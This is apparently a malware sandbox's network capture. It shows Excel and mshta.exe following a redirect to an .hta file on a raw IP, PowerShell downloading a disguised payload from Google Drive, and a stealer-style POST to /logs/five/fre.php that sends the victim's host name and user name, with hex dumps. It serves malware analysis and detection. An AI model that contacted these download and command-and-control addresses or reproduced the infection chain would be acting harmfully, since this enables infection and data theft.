                                                                                    Oct 24, 2024 08:47:38.645071983 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.ruAlbus040965ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                    Oct 24, 2024 08:47:39.590569973 CEST236INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Thu, 24 Oct 2024 06:47:39 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Content-Length: 23
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Status: 404 Not Found
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                    83192.168.2.224925694.156.177.22080
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Oct 24, 2024 08:47:39.734195948 CEST244OUTPOST /logs/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.220
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: F0B98DE8
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Oct 24, 2024 08:47:39.740084887 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.ruAlbus040965ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                    Oct 24, 2024 08:47:40.694453001 CEST236INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Thu, 24 Oct 2024 06:47:40 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Content-Length: 23
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Status: 404 Not Found
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    0192.168.2.22491635.159.62.2444433208C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-24 06:45:23 UTC453OUTGET /uiklDr?&colloquia=wistful&stadium=tangy&earthquake=feigned&official=quizzical&display=fearless&technology=instinctive&feed=abusive&character HTTP/1.1
                                                                                    Accept: */*
                                                                                    UA-CPU: AMD64
                                                                                    Accept-Encoding: gzip, deflate
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                    Host: mpa.li
                                                                                    Connection: Keep-Alive
                                                                                    2024-10-24 06:45:23 UTC460INHTTP/1.1 302 Found
                                                                                    Server: nginx
                                                                                    Date: Thu, 24 Oct 2024 06:45:23 GMT
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Content-Length: 98
                                                                                    Connection: close
                                                                                    X-DNS-Prefetch-Control: off
                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                    Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                                                    X-Download-Options: noopen
                                                                                    X-Content-Type-Options: nosniff
                                                                                    X-XSS-Protection: 0
                                                                                    Location: http://192.3.176.141/36/bv/seethebestthingstobegoodwithhislifebestthigns.hta
                                                                                    Vary: Accept
                                                                                    2024-10-24 06:45:23 UTC98INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 39 32 2e 33 2e 31 37 36 2e 31 34 31 2f 33 36 2f 62 76 2f 73 65 65 74 68 65 62 65 73 74 74 68 69 6e 67 73 74 6f 62 65 67 6f 6f 64 77 69 74 68 68 69 73 6c 69 66 65 62 65 73 74 74 68 69 67 6e 73 2e 68 74 61
                                                                                    Data Ascii: Found. Redirecting to http://192.3.176.141/36/bv/seethebestthingstobegoodwithhislifebestthigns.hta


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1192.168.2.22491655.159.62.2434433484C:\Windows\System32\mshta.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-24 06:45:26 UTC477OUTGET /uiklDr?&colloquia=wistful&stadium=tangy&earthquake=feigned&official=quizzical&display=fearless&technology=instinctive&feed=abusive&character HTTP/1.1
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US
                                                                                    UA-CPU: AMD64
                                                                                    Accept-Encoding: gzip, deflate
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                    Host: mpa.li
                                                                                    Connection: Keep-Alive
                                                                                    2024-10-24 06:45:26 UTC460INHTTP/1.1 302 Found
                                                                                    Server: nginx
                                                                                    Date: Thu, 24 Oct 2024 06:45:26 GMT
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Content-Length: 98
                                                                                    Connection: close
                                                                                    X-DNS-Prefetch-Control: off
                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                    Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                                                    X-Download-Options: noopen
                                                                                    X-Content-Type-Options: nosniff
                                                                                    X-XSS-Protection: 0
                                                                                    Location: http://192.3.176.141/36/bv/seethebestthingstobegoodwithhislifebestthigns.hta
                                                                                    Vary: Accept
                                                                                    2024-10-24 06:45:26 UTC98INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 39 32 2e 33 2e 31 37 36 2e 31 34 31 2f 33 36 2f 62 76 2f 73 65 65 74 68 65 62 65 73 74 74 68 69 6e 67 73 74 6f 62 65 67 6f 6f 64 77 69 74 68 68 69 73 6c 69 66 65 62 65 73 74 74 68 69 67 6e 73 2e 68 74 61
                                                                                    Data Ascii: Found. Redirecting to http://192.3.176.141/36/bv/seethebestthingstobegoodwithhislifebestthigns.hta


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2192.168.2.2249168216.58.212.1744434000C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-24 06:45:40 UTC121OUTGET /uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur HTTP/1.1
                                                                                    Host: drive.google.com
                                                                                    Connection: Keep-Alive
                                                                                    2024-10-24 06:45:41 UTC1319INHTTP/1.1 303 See Other
                                                                                    Content-Type: application/binary
                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                    Pragma: no-cache
                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                    Date: Thu, 24 Oct 2024 06:45:41 GMT
                                                                                    Location: https://drive.usercontent.google.com/download?id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur&export=download
                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-JjpljUN6QLxpW3qwojjIqQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                    Server: ESF
                                                                                    Content-Length: 0
                                                                                    X-XSS-Protection: 0
                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                    X-Content-Type-Options: nosniff
                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                    Connection: close


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3192.168.2.2249169142.250.186.974434000C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-24 06:45:42 UTC139OUTGET /download?id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur&export=download HTTP/1.1
                                                                                    Host: drive.usercontent.google.com
                                                                                    Connection: Keep-Alive
                                                                                    2024-10-24 06:45:45 UTC4906INHTTP/1.1 200 OK
                                                                                    Content-Type: image/jpeg
                                                                                    Content-Security-Policy: sandbox
                                                                                    Content-Security-Policy: default-src 'none'
                                                                                    Content-Security-Policy: frame-ancestors 'none'
                                                                                    X-Content-Security-Policy: sandbox
                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                    Cross-Origin-Embedder-Policy: require-corp
                                                                                    Cross-Origin-Resource-Policy: same-site
                                                                                    X-Content-Type-Options: nosniff
                                                                                    Content-Disposition: attachment; filename="new_image-new.jpg"
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Access-Control-Allow-Credentials: false
                                                                                    Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                                                    Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                                    Accept-Ranges: bytes
                                                                                    Content-Length: 2239109
                                                                                    Last-Modified: Mon, 21 Oct 2024 13:42:20 GMT
                                                                                    X-GUploader-UploadID: AHmUCY15UN_2tXcodDNahj6XcAog4rH2fGPOt7x9_GRM6bTuA4k4sSDdOvBWNW7G5tnBkhXWuUSbeNMQEA
                                                                                    Date: Thu, 24 Oct 2024 06:45:44 GMT
                                                                                    Expires: Thu, 24 Oct 2024 06:45:44 GMT
                                                                                    Cache-Control: private, max-age=0
                                                                                    X-Goog-Hash: crc32c=WqxmdA==
                                                                                    Server: UploadServer
                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                    Connection: close
                                                                                    2024-10-24 06:45:45 UTC4906INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1
                                                                                    Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#B
                                                                                    2024-10-24 06:45:45 UTC4884INData Raw: 38 d5 54 75 bf 6a c0 e8 60 f3 a2 a9 67 37 cf 1e a3 c5 fc b1 89 42 29 28 a3 70 07 6a 8f 80 1d 71 35 99 8a b1 0d b5 57 a0 3d b2 1f 56 1a 7a 2d 7e a2 45 8a c0 d0 1a 84 45 54 44 ed db be 66 4f a8 42 ce 80 35 6e ba ba e7 1a 56 de f6 a0 0f f1 57 7c 52 6d 1c 92 cc 5c 11 4c d4 49 ed 80 54 9d 95 55 54 b1 04 56 ef 6c 87 44 23 76 d6 af e2 20 61 e2 54 40 a9 76 40 ab f7 ce 62 e2 e8 a9 5e 84 1c 08 82 7d 8c a8 45 2e de 2f b9 cd 04 62 f1 19 03 ed 55 b5 34 6c 13 99 53 48 aa 43 28 23 68 01 89 e7 9c 98 27 46 81 d1 49 00 1d c6 fb 9c 07 6f 7c 8a 24 76 64 ec a4 5e 15 62 d3 c0 8c e5 e5 24 03 e9 02 c5 62 1a 6d 62 bb 00 cc 14 ad 81 78 71 36 e4 61 be af 8c 0c ad 42 99 26 76 51 44 9a 0a 16 b8 c5 99 19 0d 32 90 7e 23 35 a4 11 b3 15 27 e2 0f 4b e3 17 d4 ed 10 80 24 dc 4f 40 70 33 eb
                                                                                    Data Ascii: 8Tuj`g7B)(pjq5W=Vz-~EETDfOB5nVW|Rm\LITUTVlD#v aT@v@b^}E./bU4lSHC(#h'FIo|$vd^b$bmbxq6aB&vQD2~#5'K$O@p3
                                                                                    2024-10-24 06:45:45 UTC1324INData Raw: f9 18 1a 03 c4 23 6b 26 3e a2 b2 24 d6 c3 22 14 64 b1 ef ed 88 84 29 76 39 ca bd 12 08 bf cb 00 a4 c2 14 98 d5 83 0e 84 9c 9d 36 a5 e0 63 42 c9 e7 9c 18 e0 82 47 07 2c 14 16 14 d5 f0 ac 0d 24 f1 5d a4 03 18 2f ee 33 6b 47 ad d3 3e 98 4d 26 91 19 99 d9 77 32 b9 ae 9e a2 43 00 33 ca 86 52 de ae 08 03 9c 29 21 94 85 5e 2a b8 e3 eb d7 e5 81 e9 07 8b 40 da 67 d5 0f 0e d3 10 ac 29 77 3d 76 04 fe 3e c4 af e7 f0 39 da 6f 1b d3 6a 1c ef d0 c2 18 ad 85 4d ec c4 fc 8b f3 f4 ed ce 61 40 cf 14 91 b0 04 a8 24 15 27 f8 4f 0c 3f 2c a2 b4 b0 b9 da 40 ba b0 c0 30 ef 55 63 b7 be 06 9c de 2d 13 9a 1a 38 a3 b3 cb 29 6b 35 f0 2c 72 ad e3 50 00 36 f8 74 25 bd ed f9 ff 00 c5 99 f3 17 91 43 33 12 d4 7f 11 ba e7 b6 2e 18 b2 d8 8c 00 bf e2 16 0e 06 be b7 c5 22 62 a9 1e 8e 28 db 68
                                                                                    Data Ascii: #k&>$"d)v96cBG,$]/3kG>M&w2C3R)!^*@g)w=v>9ojMa@$'O?,@0Uc-8)k5,rP6t%C3."b(h
                                                                                    2024-10-24 06:45:45 UTC1378INData Raw: e5 93 f7 c4 14 49 da 40 2a 7e 3f 96 07 ad 79 e3 61 bd 4e d0 7b e4 95 8a 45 b0 c5 8f c3 02 ba 33 cb 53 00 3b 9c 80 42 b1 3b b9 f9 60 18 ce aa 42 b2 86 1d 2c 76 f9 e3 0e ab 40 03 c5 70 31 00 f6 a4 48 6a fa 1d b8 cc 2f e7 00 a5 a9 94 58 f8 8c 0e 24 5d 61 13 77 6b 03 e1 92 17 af 1f 8b 8b c9 29 b5 49 1f 2c 00 18 b9 2d 6c 4f c7 28 47 15 75 86 08 42 f2 6b 2a c9 e9 3e bc 08 42 03 02 af 44 f7 ba cd 6f 04 d6 47 a2 d4 4a f3 be d5 70 2b 82 6d be 99 8e 14 03 f8 ac e1 01 2b d3 ad 7b d6 07 a4 f1 bd 8b 0a ea 53 53 2c 72 6d 0a b1 86 20 1e 7a fe 59 89 11 d7 6a 17 64 26 79 1a e8 90 cc 76 df c7 a0 ca b3 a3 43 24 b3 6a 7f 7b c0 45 ae 4d 77 bf 6c 67 c3 5e 72 fb 20 75 60 80 ca 55 ba 13 44 1f e7 81 53 a2 f1 b4 86 49 8c b3 20 4e 4a 89 da c8 fa 1c 57 45 ac f1 1d 44 a4 c5 aa 76 65
                                                                                    Data Ascii: I@*~?yaN{E3S;B;`B,v@p1Hj/X$]awk)I,-lO(GuBk*>BDoGJp+m+{SS,rm zYjd&yvC$j{EMwlg^r u`UDSI NJWEDve
                                                                                    2024-10-24 06:45:45 UTC1378INData Raw: d4 b2 c6 e2 c0 b3 63 fa e0 66 d4 34 f3 16 51 42 c9 03 28 ac 03 31 65 dc 4f 7f 6c 06 e7 83 7e 99 69 cb 32 f7 6e ff 00 2c 5a 39 4a c0 e9 cd 9e 38 cd 24 4f 37 40 10 47 6c 3a 1f ae 27 36 92 58 80 97 69 00 1b 35 81 30 05 58 83 ca 01 00 f7 cf b2 7e cf b4 a9 3f ec fb 47 a6 9e 36 97 4f a8 fb 42 11 94 77 56 88 29 e7 b7 cf b6 7c 6a 58 19 c8 f2 eb 6d 73 66 8f 39 fa 1b f6 20 88 bf 60 e7 77 65 21 f5 ce 36 b3 71 7b 50 00 47 c4 d0 fa e0 7c f3 ec 86 96 0d 24 df 69 61 de cc 9f 72 5f 4c 4e 18 b2 99 62 23 d4 78 ee 01 6e c3 a6 0b f6 84 1a 2f da f4 cd 33 8d 41 69 34 c7 72 a8 51 b7 62 71 ed d3 bf 7b be 3a 66 ef d9 08 53 67 da 44 1a 69 62 f1 18 b4 4e 93 ab 23 16 45 43 10 29 60 05 03 d2 d4 a0 0a af 86 64 7d b5 d6 e9 b5 bf b4 81 3b 23 16 94 69 24 01 db 90 1a 28 d8 0e bf 1c 0d 1f
                                                                                    Data Ascii: cf4QB(1eOl~i2n,Z9J8$O7@Gl:'6Xi50X~?G6OBwV)|jXmsf9 `we!6q{PG|$iar_LNb#xn/3Ai4rQbq{:fSgDibN#EC)`d};#i$(
                                                                                    2024-10-24 06:45:45 UTC1378INData Raw: 70 0e 51 21 52 69 af da f1 39 f6 b2 96 08 c5 98 50 be d8 58 85 a9 12 bb 31 f7 f6 c0 cc a1 66 dd e6 1f 2c f4 17 81 d1 2f 9b 09 2e a4 b0 e3 e9 8b 3a 3c 4c cd 1d 2a 91 cf 18 c3 29 58 5a 9c d9 3e 9f 96 1e 08 8c b0 82 dc af 42 47 38 19 e1 37 37 ac 6e 1e f8 64 2c ea 50 8b 5a e2 86 72 43 20 d6 98 ca 91 10 e6 f1 98 e2 02 56 0a 59 42 8b 23 df 01 78 b4 e9 01 ad a6 db b0 c3 47 a2 56 90 52 30 0d d6 fb 64 88 77 4d bc c8 dc 9e 06 3a 6d 23 01 59 b7 11 d7 02 87 46 9a 6b 23 93 d3 e9 81 56 57 0c 03 58 06 a8 8e 70 da 98 8b 4d 13 09 58 9a a2 07 f3 c4 91 36 ea 25 46 91 89 bf 4f 15 81 05 48 73 66 fe 99 59 d0 32 6d 65 e4 64 32 32 cc 41 73 f0 bc ba 5b 0d 92 1b 61 d0 d6 02 fa 7d 3a 39 3e 9f 52 f4 38 dc 6b 21 43 bb a8 e9 95 8c 04 52 43 10 df 2c 32 12 50 6d 66 2c 7a fc 30 2f 06 8d
                                                                                    Data Ascii: pQ!Ri9PX1f,/.:<L*)XZ>BG877nd,PZrC VYB#xGVR0dwM:m#YFk#VWXpMX6%FOHsfY2med22As[a}:9>R8k!CRC,2Pmf,z0/
                                                                                    2024-10-24 06:45:45 UTC1378INData Raw: 8b 1a 88 d4 12 59 54 13 5b be 27 af c8 e2 ad b4 01 4a 40 bc d0 d5 13 ac 08 c8 d1 88 d5 76 ae f9 94 33 72 c4 96 05 ae c9 e4 7e 43 e2 b0 d3 48 83 99 74 f4 7b 79 e9 ff 00 ab 01 32 29 b9 26 8f b6 16 02 34 ee 25 08 c5 87 2a bb c8 03 e7 44 1f d7 0f f7 49 0c 77 be 02 4f ff 00 6f 4f fd 59 0d a4 95 63 16 d0 90 be d3 23 7e 81 b0 1a 86 59 f5 09 23 43 24 e1 4d 1d cd 2b 11 d0 58 15 c0 b3 fe 20 46 44 5a 83 3b 14 59 a6 89 55 50 bb b4 cc 6c d8 56 ef d3 93 f9 7b 62 09 a7 96 48 77 a3 42 01 3c dc aa a4 8f 88 2c 32 1f 49 22 a9 25 a1 20 2e ea 12 27 4f a3 73 80 ea 99 bc a5 f3 1a 44 2e 18 28 69 18 f2 0a f5 00 93 5c 9e dd 33 33 5c 85 67 60 58 b1 e2 d9 9a cf f7 af 9e 73 bb 36 9c 21 24 aa 12 47 3c 73 5f 9e 2c 78 04 0b a3 c9 27 02 83 83 9a be 16 e9 1c 52 33 90 29 81 e7 e5 99 4a 2c
                                                                                    Data Ascii: YT['J@v3r~CHt{y2)&4%*DIwOoOYc#~Y#C$M+X FDZ;YUPlV{bHwB<,2I"% .'OsD.(i\33\g`Xs6!$G<s_,x'R3)J,
                                                                                    2024-10-24 06:45:45 UTC1378INData Raw: e6 f0 1a af 0a 7d 3c 28 c5 9a 49 e5 7f c2 ab ba 8d 73 df 03 23 cb 74 9c 30 7b 46 1e a5 6e c7 e1 84 49 e5 8c 32 a3 6d 0c a5 58 fb 8b bc 31 d3 ba 30 66 46 a2 0d 6e 15 5d bf a6 09 d8 19 02 81 47 df 03 d0 7d 9e 56 6d 0b d3 6d 01 ec 1f a5 62 bf 68 55 9b 57 a7 0d d7 6f 1f 1f 56 5b c2 35 03 45 0c 9e 71 db 16 e5 36 db af 9b 1c 7e 78 2f 13 d4 47 ac d4 c6 da 76 de 11 4a 9d bb ab df db 03 d0 1d eb a5 2a 59 98 85 6f c5 db e1 9e 7f ec d0 65 9a 72 39 f4 0f e7 9a e7 59 12 e9 49 97 74 67 98 d4 10 c6 cd 7b 7d 33 27 c1 b7 e9 27 73 22 32 ab a8 16 55 b9 eb d0 56 03 3e 3f a7 f3 60 13 85 f5 44 68 ff 00 ba 7f eb 97 d0 f8 ac 6b e1 db a4 3c c4 84 f4 27 75 76 c7 27 96 07 86 45 91 c4 6a ca 08 69 01 0a 77 03 c0 be a7 8c f1 c2 45 86 52 a5 4b c5 7c 7a a8 10 3e 38 1e 8f 45 71 81 23 bb
                                                                                    Data Ascii: }<(Is#t0{FnI2mX10fFn]G}VmmbhUWoV[5Eq6~x/GvJ*Yoer9YItg{}3''s"2UV>?`Dhk<'uv'EjiwERK|z>8Eq#
                                                                                    2024-10-24 06:45:45 UTC1378INData Raw: cc cb ea 1c 74 00 05 ac 0c 9f b3 cc 90 78 d7 da 68 22 d6 ab 38 f0 89 e4 9e 58 dc c8 a1 d4 44 ad d4 72 c4 ee 2c 47 16 c2 bb 67 8a fb 55 10 93 ed ee 9b 50 24 0b 1c c9 a2 0a c1 83 32 8f 22 1f 51 5f c4 07 3d c6 6b 7d 84 d4 3e 8b c6 3e d6 46 92 42 d1 a7 83 6a 9c 79 60 fa 76 95 3b 41 20 1e fc e6 27 db 14 0d f6 bd 1c 39 15 a7 d1 15 63 dc 7d de 2a c0 f4 9f b5 e9 e4 66 fb 3d e6 24 b1 ca 9a 3d 92 ab 22 a8 0d b5 18 f0 39 1c b5 73 ed 9f 39 d3 40 41 2e 25 da c3 e1 9f 58 fd b3 cb a6 6f 1d f0 5d 3e a6 49 04 50 a3 89 5d 41 69 0f 0a 68 02 40 ff 00 47 3e 63 19 73 11 0b 11 65 00 0e 08 04 1b e8 6b eb 80 16 49 4a b2 79 a5 95 81 06 85 60 df 46 15 81 f3 38 35 7e 95 be 3e 39 a4 c9 b9 76 15 28 d5 dc 7f 5c 4e 73 e4 05 56 91 c5 9a e2 bf b6 05 f4 30 9f 35 9c 92 39 b5 0d 44 9b f9 65
                                                                                    Data Ascii: txh"8XDr,GgUP$2"Q_=k}>>FBjy`v;A '9c}*f=$="9s9@A.%Xo]>IP]Aih@G>csekIJy`F85~>9v(\NsV059De
                                                                                    2024-10-24 06:45:45 UTC1378INData Raw: 11 c0 1d b0 d0 a2 e9 d0 24 67 8e a4 62 b1 6a 36 30 0e 9b bb 59 ca c9 29 56 2c ad c9 e8 30 0c 1d 9a 6a 0e a2 8d 73 91 3f 98 ac a4 b2 d0 3e aa 1d 46 26 67 31 a3 3c 8a a3 6f 37 8a 68 7c 54 6a f5 6e a1 58 93 d2 ff 00 0e 06 b1 71 e6 86 14 01 e3 35 1a 26 01 02 90 40 51 98 a6 46 ad a5 68 8f 61 8f 47 3b be 94 12 18 38 e2 fb d6 03 ee 8a 40 e5 77 03 57 ed 99 72 41 73 19 59 82 95 36 6c f1 8d 39 91 62 57 03 e2 d7 94 79 b7 46 43 42 ac 08 a6 e7 00 12 a4 72 c2 35 01 d6 ec f4 c5 11 d9 e4 6d cc 09 19 da 9d f3 41 22 44 16 26 2a 55 6b b6 28 35 02 2d 54 7a 5a b7 65 b2 c7 e0 30 0b a9 94 45 a9 44 67 1b 4f 38 ea ea 12 29 46 c2 b5 fc 40 e2 7a bd 3a 4e ea d2 2a 8d b5 cd e5 e0 81 5d 4c c4 86 8f a5 8c 0d b6 d5 a0 d3 f9 88 a1 56 bf 2c cc 96 68 e6 f5 07 52 4f c7 13 f1 2d 54 ef a0 91
                                                                                    Data Ascii: $gbj60Y)V,0js?>F&g1<o7h|TjnXq5&@QFhaG;8@wWrAsY6l9bWyFCBr5mA"D&*Uk(5-TzZe0EDgO8)F@z:N*]LV,hRO-T


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4192.168.2.22491705.159.62.2444433208C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-24 06:45:43 UTC453OUTGET /uiklDr?&colloquia=wistful&stadium=tangy&earthquake=feigned&official=quizzical&display=fearless&technology=instinctive&feed=abusive&character HTTP/1.1
                                                                                    Accept: */*
                                                                                    UA-CPU: AMD64
                                                                                    Accept-Encoding: gzip, deflate
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                    Host: mpa.li
                                                                                    Connection: Keep-Alive
                                                                                    2024-10-24 06:45:43 UTC460INHTTP/1.1 302 Found
                                                                                    Server: nginx
                                                                                    Date: Thu, 24 Oct 2024 06:45:43 GMT
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Content-Length: 98
                                                                                    Connection: close
                                                                                    X-DNS-Prefetch-Control: off
                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                    Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                                                    X-Download-Options: noopen
                                                                                    X-Content-Type-Options: nosniff
                                                                                    X-XSS-Protection: 0
                                                                                    Location: http://192.3.176.141/36/bv/seethebestthingstobegoodwithhislifebestthigns.hta
                                                                                    Vary: Accept
                                                                                    2024-10-24 06:45:43 UTC98INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 39 32 2e 33 2e 31 37 36 2e 31 34 31 2f 33 36 2f 62 76 2f 73 65 65 74 68 65 62 65 73 74 74 68 69 6e 67 73 74 6f 62 65 67 6f 6f 64 77 69 74 68 68 69 73 6c 69 66 65 62 65 73 74 74 68 69 67 6e 73 2e 68 74 61
                                                                                    Data Ascii: Found. Redirecting to http://192.3.176.141/36/bv/seethebestthingstobegoodwithhislifebestthigns.hta


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5192.168.2.22491735.159.62.2434432600C:\Windows\System32\mshta.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-24 06:45:45 UTC477OUTGET /uiklDr?&colloquia=wistful&stadium=tangy&earthquake=feigned&official=quizzical&display=fearless&technology=instinctive&feed=abusive&character HTTP/1.1
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US
                                                                                    UA-CPU: AMD64
                                                                                    Accept-Encoding: gzip, deflate
